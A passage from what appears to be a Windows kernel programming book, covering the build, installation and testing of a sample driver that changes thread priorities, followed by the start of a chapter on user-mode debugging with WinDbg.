    _In_     BOOLEAN Exclusive,
    _Outptr_ PDEVICE_OBJECT *DeviceObject);
The parameters to IoCreateDevice are described below:
• DriverObject - the driver object to which this device object belongs. This should simply be the
driver object passed to the DriverEntry function.
• DeviceExtensionSize - extra bytes that would be allocated in addition to sizeof(DEVICE_OBJECT).
Useful for associating some data structure with a device. It’s less useful for software drivers
creating just a single device object, since the state needed for the device can simply be managed by
global variables.
• DeviceName - the internal device name, typically created under the \Device Object Manager
directory.
• DeviceType - relevant to some type of hardware-based drivers. For software drivers, the value
FILE_DEVICE_UNKNOWN should be used.
• DeviceCharacteristics - a set of flags, relevant for some specific drivers. Software drivers specify
zero or FILE_DEVICE_SECURE_OPEN if they support a true namespace (rarely needed by software
drivers). More information on device security is presented in chapter 8.
• Exclusive - should more than one file object be allowed to open the same device? Most drivers should
specify FALSE, but in some cases TRUE is more appropriate; it forces a single client at a time for the
device.
• DeviceObject - the returned pointer, passed as an address of a pointer. If successful,
IoCreateDevice allocates the structure from non-paged pool and stores the resulting pointer inside the
dereferenced argument.
Before calling IoCreateDevice we must create a UNICODE_STRING to hold the internal device name:
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\Booster");
// alternatively,
// RtlInitUnicodeString(&devName, L"\\Device\\Booster");
The device name could be anything but should be in the \Device object manager directory. There are
two ways to initialize a UNICODE_STRING with a constant string. The first is using
RtlInitUnicodeString, which works just fine. But RtlInitUnicodeString must count the number of
characters in the string to initialize the Length and MaximumLength appropriately. Not a big deal in this case, but
there is a quicker way - using the RTL_CONSTANT_STRING macro, which calculates the length of the
string statically (at compile time), meaning it can only work correctly with literal strings.
Now we are ready to call the IoCreateDevice function:
PDEVICE_OBJECT DeviceObject;
NTSTATUS status = IoCreateDevice(
    DriverObject,          // our driver object
    0,                     // no need for extra bytes
    &devName,              // the device name
    FILE_DEVICE_UNKNOWN,   // device type
    0,                     // characteristics flags
    FALSE,                 // not exclusive
    &DeviceObject);        // the resulting pointer
if (!NT_SUCCESS(status)) {
    KdPrint(("Failed to create device object (0x%08X)\n", status));
    return status;
}
If all goes well, we now have a pointer to our device object. The next step is to make this device object
accessible to user-mode callers by providing a symbolic link. Creating a symbolic link involves calling
IoCreateSymbolicLink:
NTSTATUS IoCreateSymbolicLink(
_In_ PUNICODE_STRING SymbolicLinkName,
_In_ PUNICODE_STRING DeviceName);
The following lines create a symbolic link and connect it to our device object:
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\Booster");
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status)) {
KdPrint(("Failed to create symbolic link (0x%08X)\n", status));
IoDeleteDevice(DeviceObject);   // important!
return status;
}
IoCreateSymbolicLink does the work, accepting the symbolic link name and the target of the link.
Note that if the creation fails, we must undo everything done so far - in this case just the fact the device
object was created - by calling IoDeleteDevice. More generally, if DriverEntry returns any failure
status, the Unload routine is not called. If we had more initialization steps to do, we would have to
remember to undo everything until that point in case of failure. We’ll see a more elegant way of handling
this in chapter 6.
Once we have the symbolic link and the device object set up, DriverEntry can return success, indicating
the driver is now ready to accept requests.
Before we move on, we must not forget the Unload routine. Assuming DriverEntry completed
successfully, the Unload routine must undo whatever was done in DriverEntry. In our case, there are
two things to undo: device object creation and symbolic link creation. We’ll undo them in reverse order:
void BoosterUnload(_In_ PDRIVER_OBJECT DriverObject) {
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\Booster");
// delete symbolic link
IoDeleteSymbolicLink(&symLink);
// delete device object
IoDeleteDevice(DriverObject->DeviceObject);
}
Notice the device object pointer is extracted from the driver object, as it’s the only argument we get in the
Unload routine. It’s certainly possible to store the device object pointer in a global variable and access it
here directly, but there is no need. Global variables usage should be kept to a minimum.
Client Code
At this point, it’s worth writing the user-mode client code. Everything we need for the client has already
been defined.
Add a new C++ Console Application project to the solution named Boost (or some other name of your
choosing). The Visual Studio wizard should create a single source file with some “hello world” type of
code. You can safely delete all the contents of the file.
First, we add the required #includes to the Boost.cpp file:
#include <windows.h>
#include <stdio.h>
#include "..\Booster\BoosterCommon.h"
Note that we include the common header file created by the driver to be shared with the client.
Change the main function to accept command line arguments. We’ll accept a thread ID and a priority
using command line arguments and request the driver to change the priority of the thread to the given
value.
int main(int argc, const char* argv[]) {
if (argc < 3) {
printf("Usage: Boost <threadid> <priority>\n");
return 0;
}
//
// extract from command line
//
int tid = atoi(argv[1]);
int priority = atoi(argv[2]);
Next, we need to open a handle to our device. The “file name” to CreateFile should be the symbolic
link prepended with “\\.\”. The entire call should look like this:
HANDLE hDevice = CreateFile(L"\\\\.\\Booster", GENERIC_WRITE,
0, nullptr, OPEN_EXISTING, 0, nullptr);
if (hDevice == INVALID_HANDLE_VALUE)
return Error("Failed to open device");
The Error function simply prints some text with the last Windows API error:
int Error(const char* message) {
printf("%s (error=%u)\n", message, GetLastError());
return 1;
}
The CreateFile call should reach the driver in its IRP_MJ_CREATE dispatch routine. If the driver is
not loaded at this time - meaning there is no device object and no symbolic link - we’ll get error number
2 (file not found).
Now that we have a valid handle to our device, it’s time to set up the call to Write. First, we need to
create a ThreadData structure and fill in the details:
ThreadData data;
data.ThreadId = tid;
data.Priority = priority;
Now we’re ready to call WriteFile and close the device handle afterwards:
DWORD returned;
BOOL success = WriteFile(hDevice,
    &data, sizeof(data),    // buffer and length
    &returned, nullptr);
if (!success)
return Error("Priority change failed!");
printf("Priority change succeeded!\n");
CloseHandle(hDevice);
The call to WriteFile reaches the driver by invoking the IRP_MJ_WRITE major function routine.
At this point, the client code is complete. All that remains is to implement the dispatch routines we declared
on the driver side.
The Create and Close Dispatch Routines
Now we’re ready to implement the three dispatch routines defined by the driver. The simplest by far are
the Create and Close routines. All that’s needed is completing the request with a successful status. Here
is the complete Create/Close dispatch routine implementation:
NTSTATUS BoosterCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
UNREFERENCED_PARAMETER(DeviceObject);
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
Every dispatch routine accepts the target device object and an I/O Request Packet (IRP). We don’t care
much about the device object, since we only have one, so it must be the one we created in DriverEntry.
The IRP on the other hand, is extremely important. We’ll dig deeper into IRPs in chapter 6, but we need
to take a quick look at IRPs now.
An IRP is a semi-documented structure that represents a request, typically coming from one of the
managers in the Executive: the I/O Manager, the Plug & Play Manager, or the Power Manager. With
a simple software driver, that would most likely be the I/O Manager. Regardless of the creator of the IRP,
the driver’s purpose is to handle the IRP, which means looking at the details of the request and doing what
needs to be done to complete it.
Every request to the driver always arrives wrapped in an IRP, whether that’s a Create, Close, Read, Write,
or any other IRP. By looking at the IRP’s members, we can figure out the type and details of the request
(technically, the dispatch routine itself was pointed to based on the request type, so in most cases you
already know the request type). It’s worth mentioning that an IRP never arrives alone; it’s accompanied
by one or more structures of type IO_STACK_LOCATION. In simple cases like our driver, there is a single
IO_STACK_LOCATION. In more complex cases where there are filter drivers above or below us, multiple
IO_STACK_LOCATION instances exist, one for each layer in the device stack. (We’ll discuss this more
thoroughly in chapter 7). Simply put, some of the information we need is in the base IRP structure, and
some is in the IO_STACK_LOCATION for our “layer” in the device stack.
In the case of Create and Close, we don’t need to look into any members. We just need to set the completion
status of the IRP in its IoStatus member (of type IO_STATUS_BLOCK), which has two members:
• Status (NTSTATUS) - indicating the status this request should complete with.
• Information (ULONG_PTR) - a polymorphic member, meaning different things in different request
types. In the case of Create and Close, a zero value is just fine.
To complete the IRP, we call IoCompleteRequest. This function has a lot to do, but basically it
propagates the IRP back to its creator (typically the I/O Manager), and that manager notifies the client
that the operation has completed and frees the IRP. The second argument is a temporary priority boost
value that a driver can provide to its client. In most cases for a software driver, a value of zero is fine
(IO_NO_INCREMENT is defined as zero). This is especially true since the request completed synchronously,
so no reason the caller should get a priority boost. More information on this function is provided in chapter
7.
The last thing to do is return the same status as the one put into the IRP. This may seem like a useless
duplication, but it is necessary (the reason will be clearer in a later chapter).
You may be tempted to write the last line of BoosterCreateClose as
return Irp->IoStatus.Status;
so that the returned value is always the same as the one stored in the IRP. This code is buggy,
however, and will cause a BSOD in most cases. The reason
is that after IoCompleteRequest is invoked, the IRP pointer should be considered “poison”,
as it’s more likely than not that it has already been deallocated by the I/O manager.
The Write Dispatch Routine
This is the crux of the matter. All the driver code so far has led to this dispatch routine. This is the one
doing the actual work of setting a given thread to a requested priority.
The first thing we need to do is check for errors in the supplied data. In our case, we expect a structure of
type ThreadData. The next step is to retrieve the current IRP stack location, because the size of
the buffer happens to be stored there:
NTSTATUS BoosterWrite(PDEVICE_OBJECT, PIRP Irp) {
auto status = STATUS_SUCCESS;
ULONG_PTR information = 0;   // track used bytes
// irpSp is of type PIO_STACK_LOCATION
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
The key to getting the information for any IRP is to look inside the IO_STACK_LOCATION associated with
the current device layer. Calling IoGetCurrentIrpStackLocation returns a pointer to the correct
IO_STACK_LOCATION. In our case, there is just one IO_STACK_LOCATION, but in the general case there
could be more (in fact, a filter may be above our device), so calling IoGetCurrentIrpStackLocation
is the right thing to do.
The main ingredient in an IO_STACK_LOCATION is a monstrous union identified with the member named
Parameters, which holds a set of structures, one for each type of IRP. In the case of IRP_MJ_WRITE,
the structure to look at is Parameters.Write.
Now we can check the buffer size to make sure it’s at least the size we expect:
do {
if (irpSp->Parameters.Write.Length < sizeof(ThreadData)) {
status = STATUS_BUFFER_TOO_SMALL;
break;
}
The do keyword opens a simple do/while(false) block that allows using the break keyword to bail
out early in case of an error. We’ll discuss this technique in greater detail in chapter 7.
Next, we need to grab the user buffer’s pointer, and check if the priority value is in the legal range (1 to
31). We also check if the pointer itself is NULL, as it’s possible for the client to pass a NULL pointer for
the buffer, but the length may be greater than zero. The buffer’s address is provided in the UserBuffer
member of the IRP:
auto data = static_cast<ThreadData*>(Irp->UserBuffer);
if (data == nullptr || data->Priority < 1 || data->Priority > 31) {
status = STATUS_INVALID_PARAMETER;
break;
}
UserBuffer is typed as a void pointer, so we need to cast it to the expected type. Then we check the
priority value, and if not in range change the status to STATUS_INVALID_PARAMETER and break out of
the “loop”.
Notice the order of checks: the pointer is compared to NULL first, and only if non-NULL, the
next check takes place. If data is NULL, however, no further checks are made. This behavior
is guaranteed by the C/C++ standard, known as short circuit evaluation.
The use of static_cast asks the compiler to check whether the cast makes sense. Technically,
the C++ compiler allows casting a void pointer to any other pointer, so it doesn’t look that
useful in this case, and perhaps a C-style cast would be simpler to write. Still, it’s a good habit
to have, as it can catch some errors at compile time.
We’re getting closer to our goal. The API we would like to use is KeSetPriorityThread, prototyped as
follows:
KPRIORITY KeSetPriorityThread(
    _Inout_ PKTHREAD Thread,
    _In_    KPRIORITY Priority);
The KPRIORITY type is defined as a 32-bit signed integer (LONG), although actual priority values fit in a single byte. The thread itself is identified by a pointer to a KTHREAD
object. KTHREAD is one part of the way the kernel manages threads. It’s completely undocumented, but
we need the pointer value anyway. We have the thread ID from the client, and need to somehow get a
hold of a pointer to the real thread object in kernel space. The function that can look up a thread by its ID
is aptly named PsLookupThreadByThreadId. To get its definition, we need to add another #include:
#include <ntifs.h>
You must add this #include before <ntddk.h>, otherwise you’ll get compilation errors. In fact,
you can remove <ntddk.h> entirely, as it’s included by <ntifs.h>.
Here is the definition for PsLookupThreadByThreadId:
NTSTATUS PsLookupThreadByThreadId(
    _In_     HANDLE ThreadId,
    _Outptr_ PETHREAD *Thread);
Notice that the thread ID parameter is typed as HANDLE, but it is the ID itself that must be passed in.
The resulting pointer is typed as PETHREAD or pointer to ETHREAD. ETHREAD is completely opaque.
Regardless, we seem to have a problem since KeSetPriorityThread accepts a PKTHREAD rather than
PETHREAD. It turns out these are the same, because the first member of an ETHREAD is a KTHREAD (the
member is named Tcb). We’ll prove all this in the next chapter when we use the kernel debugger. Here is
the beginning of the definition of ETHREAD:
typedef struct _ETHREAD {
KTHREAD Tcb;
// more members
} ETHREAD;
The bottom line is we can safely switch PKTHREAD for PETHREAD or vice versa when needed without a
hitch.
Now we can turn our thread ID into a pointer:
PETHREAD thread;
status = PsLookupThreadByThreadId(ULongToHandle(data->ThreadId),
&thread);
if (!NT_SUCCESS(status))
break;
The call to PsLookupThreadByThreadId can fail, the main reason being that the thread ID does not
reference any thread in the system. If the call fails, we simply break and let the resulting NTSTATUS
propagate out of the “loop”.
We are finally ready to change the thread’s priority. But wait - what if after the last call succeeds, the
thread is terminated, just before we set its new priority? Rest assured, this cannot happen. Technically,
the thread can terminate (from an execution perspective) at that point, but that will not make our pointer
a dangling one. This is because the lookup function, if successful, increments the reference count on the
kernel thread object, so it cannot die until we explicitly decrement the reference count. Here is the call to
make the priority change:
auto oldPriority = KeSetPriorityThread(thread, data->Priority);
KdPrint(("Priority change for thread %u from %d to %d succeeded!\n",
data->ThreadId, oldPriority, data->Priority));
We get back the old priority, which we output with KdPrint for debugging purposes. All that’s left to do
now is decrement the thread object’s reference; otherwise, we have a leak on our hands (the thread object
will never die), which will only be resolved in the next system boot. The function that accomplishes this
feat is ObDereferenceObject:
ObDereferenceObject(thread);
We should also report to the client that we used the buffer provided. This is where the information
variable is used:
information = sizeof(ThreadData);
We’ll write that value to the IRP before completing it. This is the value returned in the second to last
argument of the client’s WriteFile call. All that’s left to do is to close the while “loop” and complete
the IRP with whatever status we happen to have at this time.
// end the while "loop"
} while (false);
//
// complete the IRP with the status we got at this point
//
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = information;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
And we’re done! For reference, here is the complete IRP_MJ_WRITE handler:
NTSTATUS BoosterWrite(PDEVICE_OBJECT, PIRP Irp) {
auto status = STATUS_SUCCESS;
ULONG_PTR information = 0;
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
do {
if (irpSp->Parameters.Write.Length < sizeof(ThreadData)) {
status = STATUS_BUFFER_TOO_SMALL;
break;
}
auto data = static_cast<ThreadData*>(Irp->UserBuffer);
if (data == nullptr
|| data->Priority < 1 || data->Priority > 31) {
status = STATUS_INVALID_PARAMETER;
break;
}
PETHREAD thread;
status = PsLookupThreadByThreadId(
ULongToHandle(data->ThreadId), &thread);
if (!NT_SUCCESS(status)) {
break;
}
auto oldPriority = KeSetPriorityThread(thread, data->Priority);
KdPrint(("Priority change for thread %u from %d to %d succeeded!\n",
data->ThreadId, oldPriority, data->Priority));
ObDereferenceObject(thread);
information = sizeof(ThreadData);
} while (false);
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = information;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
Installing and Testing
At this point, we can build the driver and client successfully. Our next step is to install the driver and test
its functionality. You can try the following on a virtual machine, or if you’re feeling brave enough - on
your development machine.
First, let’s install the driver. Copy the resulting booster.sys file to the target machine (if it’s not your
development machine). On the target machine, open an elevated command window and install the driver
using the sc.exe tool as we did back in chapter 2:
c:\> sc create booster type= kernel binPath= c:\Test\Booster.sys
Make sure binPath includes the full path of the resulting SYS file. The name of the driver (booster) in the
example is the name of the created Registry key, and so must be unique. It doesn’t have to be related to
the SYS file name.
Now we can load the driver:
c:\> sc start booster
If all is well, the driver will have started successfully. To make sure, we can open WinObj and look for
our device name and symbolic link. Figure 4-1 shows the symbolic link in WinObj.
Figure 4-1: Symbolic Link in WinObj
Now we can finally run the client executable. Figure 4-2 shows a thread in Process Explorer of a cmd.exe
process, selected as an example, whose priority we want to set to a new value.
Figure 4-2: Original thread priority
Run the client with the thread ID and the desired priority (replace the thread ID as needed):
c:\Test> boost 768 25
If you get an error trying to run the executable (usually it’s a Debug build), you may need to set
the runtime library to a static one instead of a DLL. Go to Project properties in Visual Studio for
the client application, C++ node, Code Generation, Runtime Library, and select Multithreaded
Debug. Alternatively, you can compile the client in Release build, and that should run without
any changes.
And voila! See figure 4-3.
You should also run DbgView and see the output when a successful priority change occurs.
Figure 4-3: Modified thread priority
Summary
We’ve seen how to build a simple, yet complete, driver, from start to finish. We created a user-mode client
to communicate with the driver. In the next chapter, we’ll tackle debugging, which is something we’re
bound to do when writing drivers that may not behave as we expect.
Chapter 5: Debugging and Tracing
Just like with any software, kernel drivers tend to have bugs. Debugging drivers, as opposed to user-mode
debugging, is more challenging. Driver debugging is essentially debugging an entire machine, not just
a specific process. This requires a somewhat different mindset. This chapter discusses user-mode and
kernel-mode debugging using the WinDbg debugger.
In this chapter:
• Debugging Tools for Windows
• Introduction to WinDbg
• Kernel Debugging
• Full Kernel Debugging
• Kernel Driver Debugging Tutorial
• Asserts and Tracing
Debugging Tools for Windows
The Debugging Tools for Windows package contains a set of debuggers, tools, and documentation focusing
on the debuggers within the package. This package can be installed as part of the Windows SDK or the
WDK, but there is no real “installation” done. The installation just copies files but does not touch the
Registry, meaning the package depends only on its own modules and the Windows built-in DLLs. This
makes it easy to copy the entire directory to any other directory including removable media.
The package contains four debuggers: Cdb.exe, Ntsd.Exe, Kd.exe, and WinDbg.exe. Here is a rundown of
the basic functionality of each debugger:
• Cdb and Ntsd are user-mode, console-based debuggers. This means they can be attached to processes,
just like any other user-mode debugger. Both have console UI - type in a command, get a response,
and repeat. The only difference between the two is that if launched from a console window, Cdb uses
the same console, whereas Ntsd always opens a new console window. They are otherwise identical.
• Kd is a kernel debugger with a console user interface. It can attach to the local kernel (Local
Kernel Debugging, described in the next section), or to another machine for a full kernel debugging
experience.
• WinDbg is the only debugger with a graphical user interface. It can be used for user-mode debugging
or kernel debugging, depending on the selection performed with its menus or the command line
arguments passed to it when launched.
A relatively recent alternative to the classic WinDbg is WinDbg Preview, available through the Microsoft
Store. This is a remake of the classic debugger with a much better user interface. It can be installed on
Windows 10 version 1607 or later. From a functionality standpoint, it’s similar to the classic WinDbg. But
it is somewhat easier to use because of the modern, convenient UI, and in fact has also solved some bugs
that still plague the classic debugger. All the commands we’ll see in this chapter work equally well with
either debugger.
Although these debuggers may seem different from one another, the user-mode debuggers are essentially
the same, as are the kernel debuggers. They are all based around a single debugger engine implemented
as a DLL (DbgEng.Dll). The various debuggers are able to use extension DLLs, that provide most of the
power of the debuggers by loading new commands.
The Debugger Engine is documented to a large extent in the Debugging tools for Windows documentation,
which makes it possible to write new debuggers (or other tools) that utilize the debugger engine.
Other tools that are part of the package include the following (partial list):
• Gflags.exe - the Global Flags tool that allows setting some kernel flags and image flags.
• ADPlus.exe - generate a dump file for a process crash or hang.
• Kill.exe - a simple tool to terminate process(es) based on process ID, name, or pattern.
• Dumpchk.exe - tool to do some general checking of dump files.
• TList.exe - lists running processes on the system with various options.
• Umdh.exe - analyzes heap allocations in user-mode processes.
• UsbView.exe - displays a hierarchical view of USB devices and hubs.
Introduction to WinDbg
This section describes the fundamentals of WinDbg, but bear in mind everything is essentially the same
for the console debuggers, with the exception of the GUI windows.
WinDbg is built around commands. The user enters a command, and the debugger responds with text
describing the results of the command. With the GUI, some of these results are depicted in dedicated
windows, such as locals, stack, threads, etc.
WinDbg supports three types of commands:
• Intrinsic commands - these commands are built-in into the debugger (part of the debugger engine),
and they operate on the target being debugged.
• Meta commands - these commands start with a period (.) and they operate on the debugging
environment, rather than directly on the target being debugged.
• Extension commands (sometimes called bang commands) - these commands start with an exclamation
point (!), providing much of the power of the debugger. All extension commands are implemented
in external DLLs. By default, the debugger loads a set of predefined extension DLLs, but more can
be loaded from the debugger directory or another directory with the .load meta command.
Writing extension DLLs is possible and is fully documented in the debugger docs. In fact, many such DLLs
have been created and can be loaded from their respective source. These DLLs provide new commands
that enhance the debugging experience, often targeting specific scenarios.
Tutorial: User mode debugging basics
If you have experience with WinDbg usage in user-mode, you can safely skip this section.
This tutorial is aimed at getting a basic understanding of WinDbg and how to use it for user-mode
debugging. Kernel debugging is described in the next section.
There are generally two ways to initiate user-mode debugging - either launch an executable and attach to
it, or attach to an already existing process. We’ll use the latter approach in this tutorial, but except for this
first step, all other operations are identical.
• Launch Notepad.
• Launch WinDbg (either the Preview or the classic one. The following screenshots use the Preview).
• Select File / Attach To Process and locate the Notepad process in the list (see figure 5-1). Then click
Attach. You should see output similar to figure 5-2.
Figure 5-1: Attaching to a process with WinDbg
Figure 5-2: First view after process attach
The Command window is the main window of interest - it should always be open. This is the one showing
the various responses of commands. Typically, most of the time in a debugging session is spent interacting
with this window.
The process is suspended - we are in a breakpoint induced by the debugger.
• The first command we'll use is ~, which shows information about all threads in the debugged
process:
0:003> ~
   0  Id: 874c.18068 Suspend: 1 Teb: 00000001`2229d000 Unfrozen
   1  Id: 874c.46ac Suspend: 1 Teb: 00000001`222a5000 Unfrozen
   2  Id: 874c.152cc Suspend: 1 Teb: 00000001`222a7000 Unfrozen
.  3  Id: 874c.bb08 Suspend: 1 Teb: 00000001`222ab000 Unfrozen
The exact number of threads you’ll see may be different than shown here.
One thing that is very important is the existence of proper symbols. Microsoft provides a public symbol
server, which allows locating symbols for most modules produced by Microsoft. This is essential in any
low-level debugging.
• To set symbols quickly, enter the .symfix command.
• A better approach is to set up symbols once and have them available for all future debugging sessions.
To do that, add a system environment variable named _NT_SYMBOL_PATH and set it to a string
like the following:
SRV*c:\Symbols*http://msdl.microsoft.com/download/symbols
The middle part (between asterisks) is a local path for caching symbols on your local machine; you
can select any path you like (including a network share, if sharing with a team is desired). Once this
environment variable is set, subsequent invocations of the debugger will find symbols automatically and load
them from the Microsoft symbol server as needed.
The debuggers in the Debugging Tools for Windows are not the only tools that look for this
environment variable. Sysinternals tools (e.g. Process Explorer, Process Monitor), Visual Studio,
and others look for the same variable as well. You set it once, and get its benefit using multiple
tools.
• To make sure you have proper symbols, enter the lm (loaded modules) command:
0:003> lm
start             end                 module name
00007ff7`53820000 00007ff7`53863000   notepad    (deferred)
00007ffb`afbe0000 00007ffb`afca6000   efswrt     (deferred)
...
00007ffc`1db00000 00007ffc`1dba8000   shcore     (deferred)
00007ffc`1dbb0000 00007ffc`1dc74000   OLEAUT32   (deferred)
00007ffc`1dc80000 00007ffc`1dd22000   clbcatq    (deferred)
00007ffc`1dd30000 00007ffc`1de57000   COMDLG32   (deferred)
00007ffc`1de60000 00007ffc`1f350000   SHELL32    (deferred)
00007ffc`1f500000 00007ffc`1f622000   RPCRT4     (deferred)
00007ffc`1f630000 00007ffc`1f6e3000   KERNEL32   (pdb symbols)   c:\symbols\kernel32.pdb\3B92DED9912D874A2BD08735BC0199A31\kernel32.pdb
00007ffc`1f700000 00007ffc`1f729000   GDI32      (deferred)
00007ffc`1f790000 00007ffc`1f7e2000   SHLWAPI    (deferred)
00007ffc`1f8d0000 00007ffc`1f96e000   sechost    (deferred)
00007ffc`1f970000 00007ffc`1fc9c000   combase    (deferred)
00007ffc`1fca0000 00007ffc`1fd3e000   msvcrt     (deferred)
00007ffc`1fe50000 00007ffc`1fef3000   ADVAPI32   (deferred)
00007ffc`20380000 00007ffc`203ae000   IMM32      (deferred)
00007ffc`203e0000 00007ffc`205cd000   ntdll      (pdb symbols)   c:\symbols\ntdll.pdb\E7EEB80BFAA91532B88FF026DC6B9F341\ntdll.pdb
The list of modules shows all modules (DLLs and the EXE) loaded into the debugged process at this time.
You can see the start and end virtual addresses into which each module is loaded. Following the module
name you can see the symbol status of this module (in parenthesis). Possible values include:
• deferred - the symbols for this module were not needed in this debugging session so far, and so
are not loaded at this time. The symbols will be loaded when needed (for example, if a call stack
contains a function from that module). This is the default value.
• pdb symbols - proper public symbols have been loaded. The local path of the PDB file is displayed.
• private pdb symbols - private symbols are available. This would be the case for your own modules,
compiled with Visual Studio. For Microsoft modules, this is very rare (at the time of writing,
combase.dll is provided with private symbols). With private symbols, you have information about
local variables and private types.
• export symbols - only exported symbols are available for this DLL. This typically means there are
no symbols for this module, but the debugger is able to use the exported symbols. It's better than
no symbols at all, but could be confusing, as the debugger will use the closest export it can find, but
the real function is most likely different.
• no symbols - the debugger attempted to locate this module's symbols, but nothing was found, not
even exported symbols (some modules have no exported symbols at all, as is typically the case for
executables and driver files).
You can force loading of a module’s symbols using the following command:
.reload /f modulename.dll
This will provide definitive evidence of whether symbols are available for this module.
Symbol paths can also be configured in the debugger’s settings dialog.
Open the File / Settings menu and locate Debugging Settings. You can then add more paths for symbol
searching. This is useful if debugging your own code, so you would like the debugger to search your
directories where relevant PDB files may be found (see figure 5-3).
Figure 5-3: Symbols and source paths configuration
Make sure you have symbols configured correctly before you proceed. To diagnose any issues, you can
enter the !sym noisy command that logs detailed information for symbol load attempts.
Back to the thread list - notice that one of the threads has a dot in front of its data. This is the current
thread as far as the debugger is concerned. This means that any command issued that involves a thread,
where the thread is not explicitly specified, will work on that thread. This “current thread” is also shown
in the prompt - the number to the right of the colon is the current thread index (3 in this example).
Enter the k command, which shows the stack trace for the current thread:
0:003> k
 # Child-SP          RetAddr           Call Site
00 00000001`224ffbd8 00007ffc`204aef5b ntdll!DbgBreakPoint
01 00000001`224ffbe0 00007ffc`1f647974 ntdll!DbgUiRemoteBreakin+0x4b
02 00000001`224ffc10 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
03 00000001`224ffc40 00000000`00000000 ntdll!RtlUserThreadStart+0x21
How can you tell that you don’t have proper symbols except using the lm command? If you see
very large offsets from the beginning of a function, this is probably not the real function name
- it’s just the closest one the debugger knows about. “Large offsets” is obviously a relative term,
but a good rule of thumb is that a 4-hex digit offset is almost always wrong.
You can see the list of calls made on this thread (user-mode only, of course). The top of the call stack in the
above output is the function DbgBreakPoint located in the module ntdll.dll. The general format of
addresses with symbols is modulename!functionname+offset. The offset is optional and could be
zero if it’s exactly the start of this function. Also notice the module name is without an extension.
In the output above, DbgBreakPoint was called by DbgUiRemoteBreakin, which was called by
BaseThreadInitThunk, and so on.
This thread, by the way, was injected by the debugger in order to break into the target forcefully.
To switch to a different thread, use the following command: ~ns where n is the thread index. Let's switch
to thread 0 and then display its call stack:
0:003> ~0s
win32u!NtUserGetMessage+0x14:
00007ffc`1c4b1164 c3              ret
0:000> k
 # Child-SP          RetAddr           Call Site
00 00000001`2247f998 00007ffc`1d802fbd win32u!NtUserGetMessage+0x14
01 00000001`2247f9a0 00007ff7`5382449f USER32!GetMessageW+0x2d
02 00000001`2247fa00 00007ff7`5383ae07 notepad!WinMain+0x267
03 00000001`2247fb00 00007ffc`1f647974 notepad!__mainCRTStartup+0x19f
04 00000001`2247fbc0 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
05 00000001`2247fbf0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
This is Notepad’s main (first) thread. The top of the stack shows the thread waiting for UI messages
(win32u!NtUserGetMessage). The thread is actually waiting in kernel mode, but this is invisible from
a user-mode debugger’s view.
An alternative way to show the call stack of another thread without switching to it, is to use the tilde and
thread number before the actual command. The following output is for thread 1’s stack:
0:000> ~1k
 # Child-SP          RetAddr           Call Site
00 00000001`2267f4c8 00007ffc`204301f4 ntdll!NtWaitForWorkViaWorkerFactory+0x14
01 00000001`2267f4d0 00007ffc`1f647974 ntdll!TppWorkerThread+0x274
02 00000001`2267f7c0 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
03 00000001`2267f7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
The above call stack is very common, and indicates a thread that is part of the thread pool.
TppWorkerThread is the thread entry point for thread pool threads (Tpp is short for “Thread
Pool Private”).
Let’s go back to the list of threads:
.  0  Id: 874c.18068 Suspend: 1 Teb: 00000001`2229d000 Unfrozen
   1  Id: 874c.46ac Suspend: 1 Teb: 00000001`222a5000 Unfrozen
   2  Id: 874c.152cc Suspend: 1 Teb: 00000001`222a7000 Unfrozen
#  3  Id: 874c.bb08 Suspend: 1 Teb: 00000001`222ab000 Unfrozen
Notice the dot has moved to thread 0 (current thread), revealing a hash sign (#) on thread 3. The thread
marked with a hash (#) is the one that caused the last breakpoint (which in this case was our initial debugger
attach).
The basic information for a thread provided by the ~ command is shown in figure 5-4.
Figure 5-4: Thread information for the ~ command
Most numbers reported by WinDbg are hexadecimal by default. To convert a value to decimal, you can
use the ? (evaluate expression) command.
Type the following to get the decimal process ID (you can then compare to the reported PID in Task
Manager):
0:000> ? 874c
Evaluate expression: 34636 = 00000000`0000874c
You can express decimal numbers with the 0n prefix, so you can get the inverse result as well:
0:000> ? 0n34636
Evaluate expression: 34636 = 00000000`0000874c
The 0y prefix can be used in WinDbg to specify binary values. For example, using 0y1100 is
the same as 0n12 as is 0xc. You can use the ? command to see the converted values.
You can examine the TEB of a thread by using the !teb command. Using !teb without an address shows
the TEB of the current thread:
0:000> !teb
TEB at 000000012229d000
    ExceptionList:        0000000000000000
    StackBase:            0000000122480000
    StackLimit:           000000012246f000
    SubSystemTib:         0000000000000000
    FiberData:            0000000000001e00
    ArbitraryUserPointer: 0000000000000000
    Self:                 000000012229d000
    EnvironmentPointer:   0000000000000000
    ClientId:             000000000000874c . 0000000000018068
    RpcHandle:            0000000000000000
    Tls Storage:          000001c93676c940
    PEB Address:          000000012229c000
    LastErrorValue:       0
    LastStatusValue:      8000001a
    Count Owned Locks:    0
    HardErrorMode:        0
0:000> !teb 00000001`222a5000
TEB at 00000001222a5000
    ExceptionList:        0000000000000000
    StackBase:            0000000122680000
    StackLimit:           000000012266f000
    SubSystemTib:         0000000000000000
    FiberData:            0000000000001e00
    ArbitraryUserPointer: 0000000000000000
    Self:                 00000001222a5000
    EnvironmentPointer:   0000000000000000
    ClientId:             000000000000874c . 00000000000046ac
    RpcHandle:            0000000000000000
    Tls Storage:          000001c936764260
    PEB Address:          000000012229c000
    LastErrorValue:       0
    LastStatusValue:      c0000034
    Count Owned Locks:    0
    HardErrorMode:        0
Some data shown by the !teb command is relatively known or easy to guess:
• StackBase and StackLimit - user-mode current stack base and stack limit for the thread.
• ClientId - process and thread IDs.
